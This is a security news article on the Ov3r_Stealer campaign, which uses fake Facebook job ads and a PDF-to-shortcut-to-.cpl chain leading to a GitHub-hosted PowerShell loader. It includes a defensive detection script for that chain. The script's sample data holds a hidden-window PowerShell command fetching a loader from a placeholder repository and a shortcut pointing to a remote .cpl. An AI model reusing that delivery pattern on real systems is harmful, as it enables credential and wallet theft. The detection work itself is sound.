Fake Facebook Job Ads Spreading ‘Ov3r_Stealer’ to Steal Crypto and Credentials


Threat actors are leveraging bogus Facebook job advertisements as a lure to trick prospective targets into installing a new Windows-based stealer malware codenamed Ov3r_Stealer.

“This malware is designed to exfiltrate credentials and crypto wallets and send those to a Telegram channel that the threat actor monitors,” Trustwave SpiderLabs said in a report shared with The Hacker News.

Ov3r_Stealer is capable of siphoning IP address-based location, hardware information, passwords, cookies, credit card information, auto-fills, browser extensions, crypto wallets, Microsoft Office documents, and a list of antivirus products installed on the compromised host.

While the exact end goal of the campaign is unknown, it is likely that the stolen information is offered for sale to other threat actors. Another possibility is that Ov3r_Stealer could be updated over time to act as a QakBot-like loader for additional payloads, including ransomware.

The starting point of the attack is a weaponized PDF file that purports to be a file hosted on OneDrive, urging users to click on an “Access Document” button embedded into it.

Trustwave said it identified the PDF file being shared on a fake Facebook account impersonating Amazon CEO Andy Jassy as well as via Facebook ads for digital advertising jobs.

Users who end up clicking on the button are served an internet shortcut (.URL) file that masquerades as a DocuSign document hosted on Discord’s content delivery network (CDN). The shortcut file then acts as a conduit to deliver a control panel item (.CPL) file, which is then executed using the Windows Control Panel process binary (“control.exe”).

The execution of the CPL file leads to the retrieval of a PowerShell loader (“DATA1.txt”) from a GitHub repository to ultimately launch Ov3r_Stealer.
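The hand-offs in the chain above (a .URL shortcut delivering a .CPL, control.exe running that .CPL, and PowerShell then pulling a stage from the web) are the points a defender can look for in endpoint telemetry. The following triage script is an added example, not code from the article or from Trustwave SpiderLabs: it parses an Internet Shortcut file and a handful of process-creation log lines and reports the suspicious hand-offs. The `key="value"` log format, the field names `Image`, `ParentImage` and `CommandLine`, and every sample line are constructed for this example; the `EXAMPLE-ACCOUNT` repository is a placeholder.

```python
"""
Added example (not from the article or Trustwave SpiderLabs): triage the
hand-offs of the described infection chain in constructed endpoint data.
Detections:
  1. a .URL file whose target is a Control Panel item (.cpl) or uses a
     non-web scheme such as file://
  2. control.exe / rundll32.exe loading a .cpl from outside the Windows
     system directories
  3. powershell.exe spawned by one of those hosts with a URL on its
     command line (the GitHub-hosted loader stage)
"""
import re
from configparser import ConfigParser
from urllib.parse import urlparse

# Where legitimate .cpl items normally live (assumption for the example).
SYSTEM_DIRS = ("c:\\windows\\system32\\", "c:\\windows\\syswow64\\")
# Binaries Windows uses to execute Control Panel items.
CPL_HOSTS = ("control.exe", "rundll32.exe")


def shortcut_target(text):
    """Return the URL= value of an Internet Shortcut (.URL, INI-style) or None."""
    cp = ConfigParser(interpolation=None)
    cp.optionxform = str  # keep the key 'URL' exactly as written
    cp.read_string(text)
    return cp.get("InternetShortcut", "URL", fallback=None)


def shortcut_findings(text):
    """Flag a .URL whose target is a .cpl or that uses a non-web scheme."""
    url = shortcut_target(text)
    if url is None:
        return []
    parts = urlparse(url)
    findings = []
    if parts.path.lower().endswith(".cpl"):
        findings.append("shortcut target is a Control Panel item (.cpl)")
    if parts.scheme.lower() not in ("http", "https"):
        findings.append(f"shortcut uses non-web scheme '{parts.scheme}'")
    return findings


_KV = re.compile(r'(\w+)="([^"]*)"')
_CPL_ARG = re.compile(r'([^"\s]+\.cpl)\b', re.IGNORECASE)


def parse_event(line):
    """Parse one constructed key="value" process-creation log line into a dict."""
    return {k.lower(): v for k, v in _KV.findall(line)}


def event_findings(event):
    """Return detection strings for one parsed process-creation event."""
    exe = event.get("image", "").lower().rsplit("\\", 1)[-1]
    parent = event.get("parentimage", "").lower().rsplit("\\", 1)[-1]
    cmd = event.get("commandline", "")
    findings = []
    if exe in CPL_HOSTS:
        for m in _CPL_ARG.finditer(cmd):
            if not m.group(1).lower().startswith(SYSTEM_DIRS):
                findings.append(f"{exe} loading .cpl outside system dirs: {m.group(1)}")
    if exe == "powershell.exe" and parent in CPL_HOSTS and "http" in cmd.lower():
        findings.append(f"powershell spawned by {parent} with a URL on its command line")
    return findings


def scan_events(lines):
    """Return [(line_number, findings)] for every line that triggered a detection."""
    hits = []
    for n, line in enumerate(lines, 1):
        found = event_findings(parse_event(line))
        if found:
            hits.append((n, found))
    return hits


# Constructed samples, not real telemetry or real artifacts from the campaign.
SAMPLE_SHORTCUT = "[InternetShortcut]\nURL=file://203.0.113.10/share/Document.cpl\n"
BENIGN_SHORTCUT = "[InternetShortcut]\nURL=https://www.example.com/doc.pdf\n"

SAMPLE_EVENTS = [
    'Time="2024-02-06T10:00:01Z" ParentImage="C:\\Windows\\explorer.exe" '
    'Image="C:\\Windows\\System32\\control.exe" '
    'CommandLine="control.exe C:\\Windows\\System32\\timedate.cpl"',
    'Time="2024-02-06T10:02:11Z" ParentImage="C:\\Windows\\explorer.exe" '
    'Image="C:\\Windows\\System32\\control.exe" '
    'CommandLine="control.exe C:\\Users\\alice\\Downloads\\Document.cpl"',
    'Time="2024-02-06T10:02:12Z" ParentImage="C:\\Windows\\System32\\rundll32.exe" '
    'Image="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe" '
    'CommandLine="powershell.exe -w hidden https://raw.githubusercontent.com/EXAMPLE-ACCOUNT/repo/main/DATA1.txt"',
]

if __name__ == "__main__":
    for f in shortcut_findings(SAMPLE_SHORTCUT):
        print("shortcut:", f)
    for n, fs in scan_events(SAMPLE_EVENTS):
        for f in fs:
            print(f"event {n}:", f)
```

The first sample event (control.exe opening the built-in `timedate.cpl`) is left alone, so the rule keys on the .cpl location rather than on control.exe itself; the second and third events are the ones that match. In production the same two predicates map onto process-creation events from Sysmon or an EDR, and the parent/child and URL check is the piece that survives even if the loader file name changes.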

[Image: Facebook Job Ads]

It is worth noting at this stage that a near-identical infection chain was recently disclosed by Trend Micro as having been put to use by threat actors to drop another stealer called Phemedrone Stealer by exploiting the Microsoft Windows Defender SmartScreen bypass flaw (CVE-2023-36025, CVSS score: 8.8).

The similarities extend to the GitHub repository used (nateeintanan2527) and the fact that Ov3r_Stealer shares code-level overlaps with Phemedrone.

“This malware has recently been reported, and it may be that Phemedrone was re-purposed and renamed to Ov3r_Stealer,” Trustwave said. “The main difference between the two is that Phemedrone is written in C#.”

The findings come as Hudson Rock revealed that threat actors are advertising their access to law enforcement request portals of major organizations like Binance, Google, Meta, and TikTok by exploiting credentials obtained from infostealer infections.

They also follow the emergence of a category of infections called CrackedCantil that leverage cracked software as an initial access vector to drop loaders like PrivateLoader and SmokeLoader, which subsequently act as a delivery mechanism for information stealers, crypto miners, proxy botnets, and ransomware.
